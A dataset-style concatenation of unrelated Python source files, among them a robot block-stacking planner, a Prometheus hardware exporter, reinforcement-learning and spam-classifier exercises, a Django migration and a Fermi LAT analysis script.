return False, stack_stable, reset_stable, num_success, fatal
if self.validate_ros_plan(ros_resp, query_block):
plan = self.ros_to_task_plan(ros_resp, self.execution_robot, self.pddl_block_lookup)
# Otherwise, plan locally
else:
base, blk, pose = pddl_problems[num_success]
query_block = blk
self._add_text('Planning block placement')
self.plan()
saved_world = pb_robot.utils.WorldSaver()
self.robot.arm.hand.Open()
# Unpack initial conditions
fixed_objs = self.fixed + [b for b in self.pddl_blocks if b != blk]
init = self._get_initial_pddl_state()
goal_terms = []
if base == self.table:
blk_pose = pb_robot.vobj.BodyPose(blk, pose)
if (not stack or num_success >= num_steps/2) and self.alternate_orientations:
init += [("Reset",)]
goal_terms.append(("AtHome", blk))
else:
init += [('Pose', blk, blk_pose),
('Supported', blk, blk_pose, self.table, self.table_pose)]
goal_terms.append(('AtPose', blk, blk_pose))
goal_terms.append(('On', blk, self.table))
else:
init += [('RelPose', blk, base, pose)]
goal_terms.append(('On', blk, base))
goal = tuple(['and'] + goal_terms)
# Plan with PDDLStream
pddl_info = get_pddlstream_info(self.robot,
fixed_objs,
self.pddl_blocks,
add_slanted_grasps=True,
approach_frame='global',
use_vision=self.use_vision,
home_pose=pose)
plan, cost = pddlstream_plan(pddl_info, init, goal,
search_sample_ratio=1.0,
max_time=INF)
if plan is None:
print("\nFailed to plan\n")
fatal = False
return False, stack_stable, reset_stable, num_success, fatal
saved_world.restore()
print("\nGot plan:")
print(plan)
# Once we have a plan, execute it
obstacles = [f for f in self.fixed if f is not None]
if not self.use_planning_server:
self.plan()
ExecuteActions(plan, real=False, pause=False, wait=False, obstacles=obstacles)
self.execute()
ExecuteActions(plan, real=real, pause=True, wait=False, prompt=False, obstacles=obstacles,
sim_fatal_failure_prob=0.0, sim_recoverable_failure_prob=0.0)
# Manage the moved blocks (add to the set when stacking, remove when unstacking)
desired_pose = query_block.get_base_link_pose()
if query_block not in self.moved_blocks:
self.moved_blocks.add(query_block)
else:
self.moved_blocks.remove(query_block)
# Check stability
if not real:
self.step_simulation(T, vis_frames=False)
#input('Press enter to check stability.')
if stack:
stable = self.check_stability(real, query_block, desired_pose)
else:
stable = True # Don't care about stability on reset
if stable == 0.:
prompt = input('Tower NOT stable. Is this true? [y: Unstable / n: Stable]')
if prompt == 'n':
stable = 1.
#input('Continue?')
# Manage the success status of the plan
if stable == 0.:
print("Unstable after execution!")
return True, stack_stable, reset_stable, num_success, False
else:
num_success += 1
if stack and num_success == num_steps/2:
print("Completed tower stack!")
stack_stable = True
stack = False
if ignore_resets:
return True, stack_stable, reset_stable, num_success, False
elif num_success == num_steps:
print("Completed tower reset!")
reset_stable = True
return True, stack_stable, reset_stable, num_success, False
except ExecutionFailure as e:
print("Planning/execution failed.")
print(e)
saved_world.restore()
if real:
self._update_block_poses()
self.robot.arm.SetJointValues(self.real_arm.convertToList(self.real_arm.joint_angles()))
self.last_obj_held = e.obj_held
return False, stack_stable, reset_stable, num_success, e.fatal
def check_stability(self, real, block_pddl, desired_pose, max_tries=2):
if self.use_vision:
# Get pose of blocks using wrist camera.
try:
poses = self._get_block_poses_wrist().poses
except:
print('Service call to get block poses failed during check stability. Exiting.')
sys.exit()
# Check if pose is close to desired_pose.
visible = False
for named_pose in poses:
if named_pose.block_id in block_pddl.readableName.split('_')[-1]:
visible = True
pose = named_pose.pose.pose
des_pos = desired_pose[0]
obs_pos = (pose.position.x, pose.position.y, pose.position.z)
print('[Check Stability] Desired Pos:', des_pos)
print('[Check Stability] Detected Pos:', obs_pos)
# First check if the pose is too far away.
dist = numpy.linalg.norm(numpy.array(obs_pos)-numpy.array(des_pos))
print(f'[Check Stability] Position Distance (>0.04): {dist}')
if dist > 0.04:
return 0.
# Also check that the block is flat on the table.
orn = desired_pose[1]
obs_orn = pyquaternion.Quaternion(pose.orientation.w, pose.orientation.x, pose.orientation.y, pose.orientation.z)
des_orn = pyquaternion.Quaternion(orn[3], orn[0], orn[1], orn[2])
angle = (des_orn.inverse*obs_orn).angle
angle = numpy.abs(numpy.rad2deg(angle))
print(f'[Check Stability] Orientation Distance (> 15): {angle}')
if angle > 15:
return 0.
# If block isn't visible, return 0.
if not visible:
print('[Check Stability] Object not visible to camera.')
return 0.
else:
end_pose = block_pddl.get_base_link_point()
dist = numpy.linalg.norm(numpy.array(end_pose) - numpy.array(desired_pose[0]))
# print(f"Distance is {dist}")
# print(f"Block dimensions are {block_pddl.get_dimensions()}")
if dist > 0.01:
print('Unstable!')
return 0.
return 1.
def validate_ros_plan(self, ros_resp, tgt_block):
""" Validates a ROS plan to move a block against the expected target block name """
if len(ros_resp.plan) == 0:
return True
else:
plan_blocks = [t.obj1 for t in ros_resp.plan if t.type == "pick"]
if len(plan_blocks) > 0:
plan_block = plan_blocks[0]
else:
return False
print(f"Received plan to move {plan_block} and expected to move {tgt_block}")
return (tgt_block.readableName == plan_block)
def robot_state_callback(self, msg):
""" Processes robot state errors and raises execution failures for planning """
cur_time = time.time()
if (cur_time - self.arm_last_error_time) < self.arm_error_check_time:
return
self.arm_last_error_time = cur_time
cur_errors = msg.current_errors
# if cur_errors.cartesian_reflex:
# reason = "Cartesian reflex error detected!"
# raise ExecutionFailure(reason=reason, fatal=False)
if cur_errors.communication_constraints_violation:
reason = "Communication constraints violation detected!"
raise ExecutionFailure(reason=reason, fatal=True)
if cur_errors.joint_position_limits_violation:
reason = "Joint position limits violation detected!"
raise ExecutionFailure(reason=reason, fatal=True)
if cur_errors.joint_motion_generator_position_limits_violation:
reason = "Joint motion generator position limits violation detected!"
raise ExecutionFailure(reason=reason, fatal=True)
def learning_server_callback(self, ros_req, base_xy=(0.5, -0.3)):
""" Service callback function to plan and execute a tower from active learning script """
from stacking_ros.srv import PlanTowerResponse
from tamp.ros_utils import ros_to_tower
tower = ros_to_tower(ros_req.tower_info)
success, stable, num_stack_stable = self.simulate_tower(
tower, True, real=self.real, base_xy=base_xy)
resp = PlanTowerResponse()
resp.success = success
resp.stable = stable
resp.num_stack_stable = num_stack_stable
return resp
def step_simulation(self, T, vis_frames=False, lifeTime=0.1):
p.setGravity(0, 0, -10, physicsClientId=self._execution_client_id)
p.setGravity(0, 0, -10, physicsClientId=self._planning_client_id)
q = self.robot.get_joint_positions()
for _ in range(T):
p.stepSimulation(physicsClientId=self._execution_client_id)
p.stepSimulation(physicsClientId=self._planning_client_id)
self.execute()
self.execution_robot.set_joint_positions(self.robot.joints, q)
self.plan()
self.robot.set_joint_positions(self.robot.joints, q)
time.sleep(1/2400.)
if vis_frames:
length = 0.1
for pddl_block in self.pddl_blocks:
pos, quat = pddl_block.get_pose()
new_x = transformation([length, 0.0, 0.0], pos, quat)
new_y = transformation([0.0, length, 0.0], pos, quat)
new_z = transformation([0.0, 0.0, length], pos, quat)
p.addUserDebugLine(pos, new_x, [1,0,0], lineWidth=3, lifeTime=lifeTime, physicsClientId=self._execution_client_id)
p.addUserDebugLine(pos, new_y, [0,1,0], lineWidth=3, lifeTime=lifeTime, physicsClientId=self._execution_client_id)
p.addUserDebugLine(pos, new_z, [0,0,1], lineWidth=3, lifeTime=lifeTime, physicsClientId=self._execution_client_id)
def simulate_action(self, action, block_ix, T=50, vis_sim=False, vis_placement=False):
"""
Perform the given action to with the given block. An observation
should be returned in the reference frame of the platform.
:param action: Place action which describes the relative pose of the block to the platform surface.
:param real_block: Belief representation of the block to perform the action on.
:param T: How many timesteps to simulate the block falling for.
:param vis_sim: Ununsed.
:return: (action, T, end_pose) End pose should be TODO: what frame?
TODO: Not sure if this method works at the moment...
"""
assert(self.platform_table is not None)
real_block = self.belief_blocks[block_ix]
pddl_block = self.pddl_blocks[block_ix]
original_pose = pddl_block.get_base_link_pose()
# Set up the PDDLStream problem for the placing the given block on the
# platform with the specified action.
self.pddl_info = get_pddlstream_info(self.robot,
self.fixed,
self.pddl_blocks,
add_slanted_grasps=False,
approach_frame='gripper',
use_vision=self.use_vision)
init = self._get_initial_pddl_state()
# Figure out the correct transformation matrix based on the action.
real_block.set_pose(Pose(ZERO_POS, Quaternion(*action.rot.as_quat())))
rotated_block = get_rotated_block(real_block)
x = action.pos[0]
y = action.pos[1]
z = self.platform_table.get_dimensions()[2]/2. + rotated_block.dimensions[2]/2 #+ 1e-5
tform = numpy.array([[1., 0., 0., x],
[0., 1., 0., y],
[0., 0., 1., z],
[0., 0., 0., 1.]])
tform[0:3, 0:3] = action.rot.as_matrix()
# Code to visualize where the block will be placed.
if vis_placement:
surface_tform = pb_robot.geometry.tform_from_pose(self.platform_table.get_base_link_pose())
body_tform = surface_tform@tform
length, lifeTime = 0.2, 0.0
pos, quat = pb_robot.geometry.pose_from_tform(body_tform)
new_x = transformation([length, 0.0, 0.0], pos, quat)
new_y = transformation([0.0, length, 0.0], pos, quat)
new_z = transformation([0.0, 0.0, length], pos, quat)
p.addUserDebugLine(pos, new_x, [1,0,0], lifeTime=lifeTime)
p.addUserDebugLine(pos, new_y, [0,1,0], lifeTime=lifeTime)
p.addUserDebugLine(pos, new_z, [0,0,1], lifeTime=lifeTime)
init += [('RelPose', pddl_block, self.platform_table, tform)]
goal = ('On', pddl_block, self.platform_table)
# Solve the PDDLStream problem.
print('Init:', init)
print('Goal:', goal)
self.plan_and_execute(init, goal, search_sample_ratio=1000)
# Execute the action.
# TODO: Check gravity compensation in the arm.
self.step_simulation(T)
end_pose = self._get_observed_pose(pddl_block, action)
observation = (action, T, end_pose)
self.step_simulation(500-T)
# Put block back in original position.
# TODO: Check if block is on the table or platform to start.
self.pddl_info = get_pddlstream_info(self.robot,
self.fixed,
self.pddl_blocks,
add_slanted_grasps=True,
approach_frame='gripper',
use_vision=self.use_vision)
init = self._get_initial_pddl_state()
goal_pose = pb_robot.vobj.BodyPose(pddl_block, original_pose)
init += [('Pose', pddl_block, goal_pose),
('Supported', pddl_block, goal_pose, self.table, self.table_pose)]
goal = ('and', ('AtPose', pddl_block, goal_pose),
('On', pddl_block, self.table))
# Solve the PDDLStream problem.
print('Init:', init)
print('Goal:', goal)
success = self.plan_and_execute(init, goal, max_time=100., search_sample_ratio=1000)
return observation
class PandaClientAgent:
"""
Lightweight client to call a PandaAgent as a service for active learning
"""
def __init__(self):
import rospy
rospy.init_node("panda_client")
self.restart_services()
def restart_services(self):
import rospy
from stacking_ros.srv import PlanTower
print("Waiting for Panda Agent server...")
rospy.wait_for_service("/plan_tower")
print("Done")
self.client = rospy.ServiceProxy(
"/plan_tower", PlanTower)
def simulate_tower(self, tower, vis, real=False):
"""
Call the PandaAgent server's `simulate_tower` method to plan and execute a tower.
Returns:
success : Flag indicating success of execution (True/False)
stable : Flag indicating (0 or 1)
num_stack_success : Number of blocks successfully stacked
"""
from stacking_ros.srv import PlanTowerRequest
from tamp.ros_utils import tower_to_ros, ros_to_tower
request = PlanTowerRequest()
request.tower_info = tower_to_ros(tower)
if vis:
w = World(tower)
env = Environment([w], vis_sim=True, vis_frames=True)
env.step(vis_frames=True)
for b in tower:
print('----- Block info -----')
print(b.name)
print(b.dimensions)
print(b.pose)
print(b.rotation)
response = self.client.call(request)
if vis:
env.disconnect()
return response.success, response.stable, response.num_stack_stable
|
5,151 | 41c44b32ce3329cbba5b9b336c4266bb20de31f0 | import shelve
def quantity_posts():
try:
data = shelve.open('data')
except Exception:
print(Exception)
else:
for key, value in sorted(data.items()):
print(key, ': \t', value, '\n')
finally:
data.close()
if __name__ == "__main__":
print('begin')
quantity_posts()
print('end')
|
5,152 | fd391d28d76b0c1b3cf6d0b5134390ab3f1267fb | #!/usr/bin/python
#
# Copyright 2018-2020 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_config import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
"""Manages access cli configuration .cli file."""
VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL
CONFIG_FILE_NAME = ".cli"
CONFIG = CliConfigurationConfig
FREQUENCY = 3
@classmethod
def _get_count(cls):
config = cls.get_config_or_default()
return config.check_count + 1
@classmethod
def reset(
cls,
check_count=None,
current_version=None,
server_versions=None,
log_handler=None,
):
if not any([check_count, current_version, server_versions, log_handler]):
return
cli_config = cls.get_config_or_default()
if check_count is not None:
cli_config.check_count = check_count
if current_version is not None:
cli_config.current_version = current_version
if server_versions is not None:
cli_config.server_versions = server_versions
if log_handler is not None:
cli_config.log_handler = log_handler
CliConfigManager.set_config(config=cli_config)
return cli_config
@classmethod
def should_check(cls):
count = cls._get_count()
cls.reset(check_count=count)
if count > cls.FREQUENCY:
return True
config = cls.get_config_or_default()
if config.current_version is None or config.min_version is None:
return True
return LooseVersion(config.current_version) < LooseVersion(config.min_version)
|
5,153 | f49a133fa94aae791ef0f1eec54cf0629f45a0ed | # -*- coding: UTF-8 -*-
'''
model = DQN,DDQN,PDQN,PDDQN,DQN_PER,DDQN_PER,DQN_InAday,DQN_PER_Ipm...
'''
# -----------ContolGame------------
# CartPole - v1, MountainCar - v0, Acrobot - v1, Pendulum - v0
# from run_ContolGame import run_Game
# run_Game('DQN', 'CartPole-v1', episodes=400) # model,env,episodes
# -----------AtariGame - ------------
from run_AtariGame import run_Game
run_Game('DQN_PER', 'Breakout', lifes=5, episodes=40001) # model,env,lifes,episodes
|
5,154 | f5820824b5b7e473b79b5dfee2f203684c3755be | # -*- coding: utf-8 -*-
import pandas as pd
import matplotlib.pyplot as plt
from tqdm import tqdm
from scipy.io import loadmat
from mpl_toolkits.mplot3d import axes3d
import matplotlib.pyplot as plt
import numpy as np
import copy
from matplotlib import cm
from matplotlib.animation import FuncAnimation
import scipy.optimize
import networkx as nx
from sklearn import svm
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
# task 13
# Загрузите данные spamTrain.mat из файла.
train_data = loadmat('data/spamTrain.mat')
x = train_data["X"]
y = train_data["y"]
test_data = loadmat('data/spamTest.mat')
x_test = test_data["Xtest"]
y_test = test_data["ytest"]
def vector_to_message(vector):
vocab_file = open("data/vocab.txt", "r")
vocab = vocab_file.readlines()
# one_hot = [int(record.split()[1] in message) for record in vocab]
message_words = []
for vocab_record, vector_enterance in zip(vocab, vector):
is_trigger_word = bool(vector_enterance)
word = vocab_record.split()[1]
if is_trigger_word:
message_words.append(word)
return " ".join(message_words)
message = vector_to_message(x_test[0])
def one_hot_convert(message):
message_words = message.split()
message_words.sort()
vocab_file = open("data/vocab.txt", "r")
vocab = vocab_file.readlines()
# one_hot = [int(record.split()[1] in message) for record in vocab]
one_hot = []
for record in vocab:
word = record.split()[1]
one_hot.append(int(word in message_words))
pass
return np.array([one_hot])
one_hot_convert() |
5,155 | 156203042ed8a9bde0e9d8587ea3d37de6bcfdf7 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sub_adjuster', '0002_parameters'),
]
operations = [
migrations.AlterField(
model_name='subtitles',
name='line_A',
field=models.CharField(max_length=255, default=None),
),
migrations.AlterField(
model_name='subtitles',
name='line_B',
field=models.CharField(max_length=255, default=None),
),
migrations.AlterField(
model_name='subtitles',
name='line_C',
field=models.CharField(max_length=255, default=None),
),
]
|
5,156 | 527d514cbad0916fecfe0da68de04d3b130d94c7 | import re
from prometheus_client.core import GaugeMetricFamily
class ArrayHardwareMetrics:
def __init__(self, fa):
self.fa = fa
self.chassis_health = None
self.controller_health = None
self.component_health = None
self.temperature = None
self.temperature = None
def _array_hardware_status(self):
"""Collect information about all system sensors."""
data = self.fa.get_hardware_status()
self.chassis_health = GaugeMetricFamily(
'purefa_hardware_chassis_health',
'FlashArray hardware chassis health status')
self.controller_health = GaugeMetricFamily(
'purefa_hardware_controller_health',
'FlashArray hardware controller health status',
labels=['controller'])
self.component_health = GaugeMetricFamily(
'purefa_hardware_component_health',
'FlashArray hardware component health status',
labels=['chassis', 'controller', 'component',
'index'])
self.temperature = GaugeMetricFamily(
'purefa_hardware_temperature_celsius',
'FlashArray hardware temperature sensors',
labels=['chassis', 'controller',
'sensor'])
self.power = GaugeMetricFamily(
'purefa_hardware_power_volts',
'FlashArray hardware power supply voltage',
labels=['chassis', 'power_supply'])
re_chassis = re.compile(r"^CH(\d+)$")
re_controller = re.compile(r"^CT(\d+)$")
re_component = re.compile(r"^(CH|CT)(\d+)\.([A-Z]+)([0-9]+)$")
for comp in data:
if (comp['status'] == 'not_installed'):
continue
component_name = comp['name']
component_state = 1 if (comp['status'] == 'ok') else 0
# Chassis
if re.match(r"^CH\d+$", component_name):
detail = re_chassis.match(component_name)
c_index = detail.group(1)
self.chassis_health.add_metric([c_index], component_state)
continue
# Controller
elif re.match(r"^CT\d+$", component_name):
detail = re_controller.match(component_name)
c_index = detail.group(1)
self.controller_health.add_metric([c_index], component_state)
continue
# Components
elif re.match(r"^C(H|T)\d+\.[A-Z]+[0-9]+$", component_name):
detail = re_component.match(component_name)
c_base = detail.group(1)
c_base_index = detail.group(2)
c_type = detail.group(3)
c_index = detail.group(4)
if c_base == 'CH':
# Chassis-based
labelset = [c_base_index, '', c_type, c_index]
else:
# Controller-based
labelset = ['', c_base_index, c_type, c_index]
# Component health status
self.component_health.add_metric(
labels=labelset, value=component_state)
if c_type.lower() == 'tmp':
# Additional metric for temperature
if c_base == 'CH':
self.temperature.add_metric(
[c_base_index, '', c_index], float(comp['temperature']))
else:
self.temperature.add_metric(
['', c_base_index, c_index], float(comp['temperature']))
elif c_type.lower() == 'pwr':
# Additional metric for voltage level
if comp['voltage'] is not None:
self.power.add_metric([c_base_index, c_index],
float(comp['voltage']))
def get_metrics(self):
self._array_hardware_status()
yield self.chassis_health
yield self.controller_health
yield self.component_health
yield self.temperature
yield self.power
|
5,157 | 836e2fd6eca7453ab7a3da2ecb21705552b5f627 | import data
import numpy as np
import matplotlib.pyplot as plt
import xgboost as xgb
import pandas as pd
import csv
from matplotlib2tikz import save as tikz_save
import trial_sets
def print_stats(trial_id, dl):
wrist_device, _, true_device = dl.load_oxygen(trial_id, iid=False)
print("Length of Dataframe: " + str(data.get_df_length(wrist_device)))
wrist_oxygen = wrist_device.values.flatten()
true_oxygen = true_device.values.flatten()
sample_count = wrist_oxygen.shape[0]
wrist_reliable_count = np.count_nonzero(~np.isnan(wrist_oxygen))
print("Samples Collected: " + str(sample_count))
algo_percent = (wrist_reliable_count / sample_count) * 100
print("Algorithm marked {} samples, or {:.1f}%, as reliable".format(wrist_reliable_count, algo_percent))
true_reliable_count = 0
for o1, o2 in zip(wrist_oxygen, true_oxygen):
difference = np.abs(np.subtract(o1, o2))
if difference <= dl.threshold:
true_reliable_count += 1
actual_precent = (true_reliable_count / sample_count) * 100
print("{}, or {:.1f}%, of labels were within {} of wrist sensor".format(true_reliable_count, actual_precent, dl.threshold))
print("Positive Labels: " + str(true_reliable_count))
def visualize_classifier_results(training_ids, test_id, dl, show_classifier=True):
if show_classifier:
X_train, y_train = dl.load(training_ids, iid=True)
X_test, y_test = dl.load([test_id], iid=False)
clf = xgb.XGBClassifier(
learning_rate=0.1,
n_estimators=101,
max_depth=3,
min_child_weight=3,
gamma=0.3,
subsample=0.9,
colsample_bytree=0.6,
scale_pos_weight=1,
reg_alpha=0.01,
objective='binary:logistic',
nthread=data.N_JOBS,
random_state=42)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
else:
y_pred = None
wrist_oxygen, wrist_oxygen_clean, true_oxygen = dl.load_oxygen(test_id, y_pred=y_pred, iid=False)
wrist_oxygen = wrist_oxygen[::5]
wrist_oxygen_clean = wrist_oxygen_clean[::5]
true_oxygen = true_oxygen[::5]
if show_classifier:
graph_df = pd.concat([wrist_oxygen, true_oxygen, wrist_oxygen_clean], axis=1, sort=True)
else:
graph_df = pd.concat([wrist_oxygen, true_oxygen], axis=1, sort=True)
assert(wrist_oxygen.shape == true_oxygen.shape)
assert(graph_df.shape[0] == wrist_oxygen.shape[0])
# plt.figure(figsize=(4 * 1.2, 3 * 1.2))
graph_df.plot.line(figsize=(4 * 1.2, 2 * 1.2))
plt.xlabel("Time (Milliseconds)")
plt.ylabel("SpO2 (%)")
plt.ylim()
plt.legend(loc='lower left')
if show_classifier:
plt.savefig(data.GRAPH_CACHE + 'classifier-{}-{}.pdf'.format(test_id, str(dl)))
tikz_save(data.LTX_CACHE + 'classifier-{}-{}.tex'.format(test_id, str(dl)))
else:
plt.savefig(data.GRAPH_CACHE + 'algos-{}-{}.pdf'.format(test_id, str(dl)))
def print_all_stats():
dl = data.DataLoader(window_size=100, threshold=1.0, algo_name='enhanced', features='comprehensive')
for trial_id in trial_sets.top_ids:
print("\nStats for trial: {}".format(trial_id))
print_stats(trial_id, dl)
def visualize_all_classifier_results():
trial_ids = trial_sets.top_ids
dl = data.DataLoader(window_size=100, threshold=2.0, algo_name='enhanced', features='comprehensive')
for trial_id in trial_ids:
print("Trial {}".format(trial_id))
training_ids = trial_ids.copy()
training_ids.remove(trial_id)
visualize_classifier_results(training_ids, trial_id, dl)
def create_error_cdf():
THRESHOLD = 2.0
dl_enhanced = data.DataLoader(window_size=100, threshold=THRESHOLD, algo_name='enhanced', features='comprehensive')
dl_maxim = data.DataLoader(window_size=100, threshold=THRESHOLD, algo_name='maxim', features='comprehensive')
maxim_errors = []
enhanced_errors = []
wristo_errors = []
for trial_id in trial_sets.top_ids:
training_ids = trial_sets.top_ids.copy()
training_ids.remove(trial_id)
X_train, y_train = dl_enhanced.load(training_ids, iid=True)
X_test, y_test = dl_enhanced.load([trial_id], iid=False)
clf = xgb.XGBClassifier(
learning_rate=0.1,
n_estimators=101,
max_depth=3,
min_child_weight=3,
gamma=0.3,
subsample=0.9,
colsample_bytree=0.6,
scale_pos_weight=1,
reg_alpha=0.01,
objective='binary:logistic',
nthread=data.N_JOBS,
random_state=42)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
wrist_enhanced, wrist_clean, fingertip_enhanced = dl_enhanced.load_oxygen(trial_id, y_pred=y_pred, iid=False)
wrist_maxim, _, fingertip_maxim = dl_maxim.load_oxygen(trial_id, iid=False)
wrist_maxim = wrist_maxim.values.flatten()
wrist_enhanced = wrist_enhanced.values.flatten()
fingertip_maxim = fingertip_maxim.values.flatten()
fingertip_enhanced = fingertip_enhanced.values.flatten()
wrist_clean = wrist_clean.values.flatten()
for oM, oE, oMF, oEF, oC in zip(wrist_maxim, wrist_enhanced, fingertip_maxim, fingertip_enhanced, wrist_clean):
maxim_errors.append(np.abs(np.subtract(oM, oMF)))
enhanced_errors.append(np.abs(np.subtract(oE, oMF)))
wristo_errors.append(np.abs(np.subtract(oC, oMF)))
maxim_errors = np.array(maxim_errors)
enhanced_errors = np.array(enhanced_errors)
wristo_errors = np.array(wristo_errors)
maxim_errors = maxim_errors[~np.isnan(maxim_errors)]
enhanced_errors = enhanced_errors[~np.isnan(enhanced_errors)]
wristo_errors = wristo_errors[~np.isnan(wristo_errors)]
rmses = [maxim_errors, enhanced_errors, wristo_errors]
plt.figure(figsize=(4 * 1.2, 2 * 1.2))
for e in rmses:
sorted_data = np.sort(e)
yvals = np.arange(len(sorted_data)) / float(len(sorted_data) - 1)
plt.plot(sorted_data, yvals)
plt.legend(['Baseline', 'Enhanced', 'WristO2'])
plt.ylim(0.0, 1.0)
plt.xlim(0.0, 10.0)
plt.xlabel('Absolute Error')
plt.savefig(data.GRAPH_CACHE + 'cdf-error-algo.pdf')
tikz_save(data.LTX_CACHE + 'cdf-error-algo.tex')
def create_fingertip_cdf():
THRESHOLD = 2.0
dl = data.DataLoader(window_size=100, threshold=THRESHOLD, algo_name='enhanced', features='comprehensive')
fingertip_error = []
csv_file = open(data.GRAPH_CACHE + 'csv-fingertip.csv', 'w')
csvwriter = csv.writer(csv_file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
csvwriter.writerow(['reflective', 'transitive'])
for trial_id in trial_sets.top_ids:
wrist_oxygen, fingertip_oxygen, transitive_oxygen = dl.load_all_oxygen(trial_id)
for oF, oT in zip(fingertip_oxygen, transitive_oxygen):
csvwriter.writerow([oF, oT])
fingertip_error.append(np.square(np.subtract(oF, oT)))
fingertip_error = np.array(fingertip_error)
fingertip_error = fingertip_error[~np.isnan(fingertip_error)]
plt.figure()
sorted_data = np.sort(fingertip_error)
yvals = np.arange(len(sorted_data)) / float(len(sorted_data) - 1)
plt.plot(sorted_data, yvals)
# plt.legend(['Baseline', 'Enhanced'])
plt.ylim(0.0, 1.0)
plt.xlabel('RMSE')
plt.savefig(data.GRAPH_CACHE + 'cdf-fingertip.pdf')
csv_file.close()
if __name__ == '__main__':
# print_all_stats()
visualize_all_classifier_results()
create_error_cdf()
# create_fingertip_cdf()
|
5,158 | 95256390e1e7e9227b96dccce33082de9d2cddd3 | import datetime
class Dato:
def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime):
self.__id = id
self.__dato = dato
self.__tipo = tipo
self.__fecha = fecha
def getId(self):
return self.__id
def setId(self, id):
self.__id = id
def getDato(self):
return self.__dato
def setDato(self, dato):
self.__dato = dato
def getTipo(self):
return self.__tipo
def setTipo(self, tipo):
self.__tipo = tipo
def getFecha(self):
return self.__fecha
def setFecha(self, fecha):
self.__fecha = fecha |
5,159 | afccf460bcf04f38b8c66177c86debd39a1b165f | # [백준] https://www.acmicpc.net/problem/11053 가장 긴 증가하는 부분 수열
# 일단 재귀식으로 풀어보기
# 이분탐색 어떻게 할 지 모르겠다
import sys
N = int(sys.stdin.readline().strip())
A = list(map(int, sys.stdin.readline().split()))
def recur():
if A[i] < A[i-1]:
|
5,160 | 66cdeaa106a8f22dbfd64c12c4cb04fdb9f5b453 | #!/usr/bin/env python
import sys
import ROOT
from ROOT import TTree
from ROOT import TChain
import numpy as np
import yaml
import xml.etree.ElementTree as ET
import datetime
#sys.path.append("/disk/gamma/cta/store/takhsm/FermiMVA/AllSky")
#sys.path.append("/home/takhsm/FermiMVA/python")
ROOT.gROOT.SetBatch()
from array import array
import math
from math import cos, sin, tan, acos, asin, atan, radians, degrees
from pColor import *
ROOT.gStyle.SetPadGridX(True)
ROOT.gStyle.SetPadGridY(True)
ROOT.gStyle.SetPadTickX(True)
ROOT.gStyle.SetPadTickY(True)
#from pCutBDT import cutBDT
from pAnalysisConfig import *
# ----- Event class setup -----
par = sys.argv
cfg = ClassConfig('Both', [10, 3, 1], 1)
aCutEGB = cfg.aCutEGB
aaStrSelect = cfg.aaStrSelect
nStartBin = cfg.nStartBin
nameFileRoc = "/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S18/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZCS000wwoTRKwoMCZDIR00woRW_15_S11D_catTwoZDIR050Log_roc.root" #par[2]
nameVarBDT = "S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_BDTG1000D06"
nameVarBDT = par[1]
nameFileSuffix = par[1]
cutMVA = CutBDT(nameFileRoc, aCutEGB)
aaValCutBDT = cutMVA.aaValCutBDT[0:]
print aaValCutBDT
nEnergyBin = cutMVA.aaValCutBDT[0]['numBin'] - nStartBin
vEnergyBinWidth = cutMVA.aaValCutBDT[0]['widthBin']
vEnergyLow = cutMVA.aaValCutBDT[0]['edgeLow'] + nStartBin*vEnergyBinWidth
vEnergyUp = vEnergyLow + nEnergyBin*vEnergyBinWidth
aaNumEventClass=[]
#aColor = []
for hS in range(len(aaStrSelect)):
aaNumEventClass.append([])
for iS in range(len(aaStrSelect[hS])):
aaNumEventClass[hS].append(0)
#IRF
listPathFilePerf = [['/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_P8R2_TRANSIENT100_P8R2_TRANSIENT100_perf.root', '/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_P8R2_SOURCE_P8R2_SOURCE_perf.root'],
['/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_CalOnly_R100_perf.root', '/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_CalOnly_R30_perf.root', '/nfs/farm/g/glast/u/mtakahas/v20r09p09_G1haB1/S16/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15/S16V200909_020RAWE20ZDIR010ZCS000wwoTRKwoMCZDIR00woRWcatTwoZDIR050_15_CalOnly_R10_perf.root']]
htgPerf = CutPerformanceHtg(listPathFilePerf)
# Data
